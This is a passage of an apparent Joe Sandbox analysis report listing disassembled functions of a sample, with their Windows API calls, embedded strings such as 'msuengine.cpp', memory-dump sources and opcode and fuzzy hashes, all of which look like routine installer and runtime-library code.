                                                                                                                                                              • Opcode ID: a306585503bf6d68b8a9ffcfbe800ea0cebb61a436c28fada40ed5e54c91f3c9
                                                                                                                                                              • Instruction ID: afea99da9b6f59a91a238adbe63f5d5a5c82c8cf11ba92ec719215b9b3cee7c3
                                                                                                                                                              • Opcode Fuzzy Hash: a306585503bf6d68b8a9ffcfbe800ea0cebb61a436c28fada40ed5e54c91f3c9
                                                                                                                                                              • Instruction Fuzzy Hash: D221F8A6901128EADB60DBAADC05EBFB3FCFB4C711F10855AF955D2180E7389A90D770
                                                                                                                                                              Function 007FAA0E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                              • Opcode ID: ae2d6a8d2affe42b813d4fa985485db7f7dcc929b3fcd5e85e42939741086253
                                                                                                                                                              • Instruction ID: ad92b5dba9cc8ff316b043d294043c66861090253d695ae3fd3936a95f860e88
                                                                                                                                                              • Opcode Fuzzy Hash: ae2d6a8d2affe42b813d4fa985485db7f7dcc929b3fcd5e85e42939741086253
                                                                                                                                                              • Instruction Fuzzy Hash: A4C228B1E0862C8BDB25CE28DD447EAB7B5EB88304F1541EAD54DE7341E778AE818F41
                                                                                                                                                              Function 007C61DF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastNameUser
                                                                                                                                                              • String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
                                                                                                                                                              • API String ID: 2054405381-1522884404
                                                                                                                                                              • Opcode ID: ae06624277f624122e7f1cabb0c3470533994107dcbe18230b9ca8d12c841a8c
                                                                                                                                                              • Instruction ID: 5233bef216166e034d9a28e45ad31e64f6dfe1b3792d9b9af3af66be38eceb3e
                                                                                                                                                              • Opcode Fuzzy Hash: ae06624277f624122e7f1cabb0c3470533994107dcbe18230b9ca8d12c841a8c
                                                                                                                                                              • Instruction Fuzzy Hash: AE01D632A01629A7C7219B559C4AFAFB7A8FB04720F10026DFC14E7281DA689D405AE5
                                                                                                                                                              Function 007FFE21 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • FormatMessageW.KERNEL32(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,008004F4,?,?,?,?,00000001), ref: 007FFE40
                                                                                                                                                              • GetLastError.KERNEL32(?,008004F4,?,?,?,?,00000001,?,007C5616,?,?,00000000,?,?,007C5395,00000002), ref: 007FFE4C
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,00000000,?,?,008004F4,?,?,?,?,00000001,?,007C5616,?,?), ref: 007FFEB5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                              • String ID: logutil.cpp
                                                                                                                                                              • API String ID: 1365068426-3545173039
                                                                                                                                                              • Opcode ID: 0876e51b130e1ed821556246d18647531cc6a4f1f05d46c319c966d35fe409e4
                                                                                                                                                              • Instruction ID: 0537667c2dc995c9730985f6f5a672d2d57c7ae9f1dc443f2e9fa8bffd00f2de
                                                                                                                                                              • Opcode Fuzzy Hash: 0876e51b130e1ed821556246d18647531cc6a4f1f05d46c319c966d35fe409e4
                                                                                                                                                              • Instruction Fuzzy Hash: DA118F32A0012DEBDB319F949D05EBF7B69FF54710F014069FE0496271EB358E20D6A0
                                                                                                                                                              Function 007E6B88 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,007E6B32,00000000,00000003), ref: 007E6B9F
                                                                                                                                                              • GetLastError.KERNEL32(?,007E6B32,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,007E6F28,?), ref: 007E6BA9
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to set service start type., xrefs: 007E6BD7
                                                                                                                                                              • msuengine.cpp, xrefs: 007E6BCD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ChangeConfigErrorLastService
                                                                                                                                                              • String ID: Failed to set service start type.$msuengine.cpp
                                                                                                                                                              • API String ID: 1456623077-1628545019
                                                                                                                                                              • Opcode ID: ce1bdf2d4ed12033627bde7fe0df975baaa6562491eb1004fc31c5bd90f06366
                                                                                                                                                              • Instruction ID: c3b6040ee03df7aae804466cbb192b05d8cc71cf598388aa659e02d9d5b5e1b2
                                                                                                                                                              • Opcode Fuzzy Hash: ce1bdf2d4ed12033627bde7fe0df975baaa6562491eb1004fc31c5bd90f06366
                                                                                                                                                              • Instruction Fuzzy Hash: 71F0A77764923577C62126965C09F8B7E48EF157B0B210325BD38EA2D0DA59890085E0
                                                                                                                                                              Function 007F3C76 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 007F3D6E
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 007F3D78
                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 007F3D85
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                              • Opcode ID: c032d8857aae06c26b1a8b5d7b75aaf624a2cb9ca8b8c1efac9eb9763a5de26e
                                                                                                                                                              • Instruction ID: 485a4105d0379e582cd49b29b01bc42fcabd97cb81aa3416644c5fd502e6bbc0
                                                                                                                                                              • Opcode Fuzzy Hash: c032d8857aae06c26b1a8b5d7b75aaf624a2cb9ca8b8c1efac9eb9763a5de26e
                                                                                                                                                              • Instruction Fuzzy Hash: 8431D27491122CABCB61DF65DD8979CBBB8BF08310F5045EAE81CA7251E7349F818F44
                                                                                                                                                              Function 007FA560 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                                                                                                                              • Instruction ID: 561d15c22e695a4acdfc1760f0c414e66d979e97938a65c56d5c9644b05df421
                                                                                                                                                              • Opcode Fuzzy Hash: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
                                                                                                                                                              • Instruction Fuzzy Hash: 6D023CB1E00219AFDF14CFA9C8806ADB7F1FF48324F258169D919E7381E774A941CB91
                                                                                                                                                              Function 00803A5F Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00803BF1: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00803A8E,?), ref: 00803C62
                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00803AB2
                                                                                                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00803AC3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2114926846-0
                                                                                                                                                              • Opcode ID: 6e6128de436ade2e4b4744ffd855c3cabd89891d6475973eeaefd52fd6a4d716
                                                                                                                                                              • Instruction ID: b896bd6ae89d94da0e78b8da806fefe03833f58ef56e4834aac691a8b1b3e178
                                                                                                                                                              • Opcode Fuzzy Hash: 6e6128de436ade2e4b4744ffd855c3cabd89891d6475973eeaefd52fd6a4d716
                                                                                                                                                              • Instruction Fuzzy Hash: 2E11F371A0061AAFDB50DFA9DC85AAFBBBCFF08304F50482AA551E6191E7709A448B61
                                                                                                                                                              Function 00804440 Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNEL32(007E923A,?,00000100,00000000,00000000), ref: 0080447B
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00804487
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                              • Opcode ID: 4f1fab7b4a1fd273644cc78c655197013fcc527820fae06a052b376bb00a5fc4
                                                                                                                                                              • Instruction ID: cbe0669d247ea9df1f0525732db17cb47fba25ecab9b00b45443a7fd3e53561a
                                                                                                                                                              • Opcode Fuzzy Hash: 4f1fab7b4a1fd273644cc78c655197013fcc527820fae06a052b376bb00a5fc4
                                                                                                                                                              • Instruction Fuzzy Hash: A101F971A0160CABDB10EF65ED8DEABB3ACFFC5315F000065F914D3280D6349D498758
                                                                                                                                                              Function 007F2C18 Relevance: 2.7, Strings: 2, Instructions: 214COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 0$comres.dll
                                                                                                                                                              • API String ID: 0-3030269839
                                                                                                                                                              • Opcode ID: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                                                                                                                              • Instruction ID: b7d3bb59e7e476b2475d03a3f4bfc2b3b3a6c3bfec16a1f40cd97d221caa4419
                                                                                                                                                              • Opcode Fuzzy Hash: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                                                                                                                              • Instruction Fuzzy Hash: F9515870304B4CD7DB385968859A7BF2B959B16340F280919EB46DB393C61DDE43C37A
                                                                                                                                                              Function 007FEE7C Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007FEE77,?,?,00000008,?,?,007FEB17,00000000), ref: 007FF0A9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                              • Opcode ID: aa746c889d504cf24ad4f21d29639c13fe96d1ec99d48302571e20c63794c341
                                                                                                                                                              • Instruction ID: d1f033aa28bf6607437d3de1c3a0ec0aa5d7b28a67e88dd1362e2de41c4890e1
                                                                                                                                                              • Opcode Fuzzy Hash: aa746c889d504cf24ad4f21d29639c13fe96d1ec99d48302571e20c63794c341
                                                                                                                                                              • Instruction Fuzzy Hash: AEB10A31610609DFD715CF28C48AB657BE0FF45364F258668EA99CF3A2C739E991CB40
                                                                                                                                                              Function 007EEC07 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 007EEC20
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2325560087-0
                                                                                                                                                              • Opcode ID: 988ad8ebc99fc42d43293ca93e747d09bb83b9ec504e7f26d8079cdc4010b8ee
                                                                                                                                                              • Instruction ID: 781e8862807b527189faf009e0c6ed1455f3c9f5aa8a870f53b70fcecca62086
                                                                                                                                                              • Opcode Fuzzy Hash: 988ad8ebc99fc42d43293ca93e747d09bb83b9ec504e7f26d8079cdc4010b8ee
                                                                                                                                                              • Instruction Fuzzy Hash: 26517C71A01245CBDB28CF5AD8856AABBF4FB4C310F25886AD405EB260D3B99D02CF61
                                                                                                                                                              Function 007EE9DC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0002E9E8,007EE131), ref: 007EE9E1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                              • Opcode ID: 5747dcd98584ebd61f3495c5cf8ad6f779fe63082d499abcb72b99cbc046b47b
                                                                                                                                                              • Instruction ID: 3f31fabe2c60b584132e25f98e88c5c743f0ec8eaf3752957024d77fab71f78a
                                                                                                                                                              • Opcode Fuzzy Hash: 5747dcd98584ebd61f3495c5cf8ad6f779fe63082d499abcb72b99cbc046b47b
                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                              Function 007EFB89 Relevance: .5, Instructions: 481COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d5ac850cd611d69f470d42133d57147f8b6e6e8c5454532167baf6dd677ec740
                                                                                                                                                              • Instruction ID: 06c77c6c73830bc7091b4513dcec69aab18210ff971e77fbd8538ffbb048ba54
                                                                                                                                                              • Opcode Fuzzy Hash: d5ac850cd611d69f470d42133d57147f8b6e6e8c5454532167baf6dd677ec740
                                                                                                                                                              • Instruction Fuzzy Hash: D2020B3220A1E24BDB2D863A847003B7FE16A433B171E476DD4F6CF9D6DE18E564D660
                                                                                                                                                              Function 007F0B6F Relevance: .4, Instructions: 352COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
                                                                                                                                                              • Instruction ID: 9fa8aac21d12b725eac7f9a1e136575493d86117b78c12724ca3df0efd058429
                                                                                                                                                              • Opcode Fuzzy Hash: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
                                                                                                                                                              • Instruction Fuzzy Hash: 27C180732091A60AEF2D4339843407EFBE15E923B131E179DD5B2CB3D6EE289535D6A0
                                                                                                                                                              Function 007F07AA Relevance: .3, Instructions: 347COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
                                                                                                                                                              • Instruction ID: 583eaa6cb2d0610be52cc796ea62fe4a31a95be06a205be9a3940e9d0e7c96ef
                                                                                                                                                              • Opcode Fuzzy Hash: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
                                                                                                                                                              • Instruction Fuzzy Hash: CEC1B5732051A64AEF2D8239843407EBBE15E823B131E579DD5F2CB3C7EE289534D6A0
                                                                                                                                                              Function 007F03D5 Relevance: .3, Instructions: 331COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
                                                                                                                                                              • Instruction ID: 1de05e278604d87d0b6fc32ff88f1fe6dc7e00321c02a54f9a5b35871a21f86b
                                                                                                                                                              • Opcode Fuzzy Hash: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
                                                                                                                                                              • Instruction Fuzzy Hash: D5C1C5322050A64BEF2D8239847447EBBE15E933B131A079DD5B2CB3D3EE28D534DA60
                                                                                                                                                              Function 007F001D Relevance: .3, Instructions: 323COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
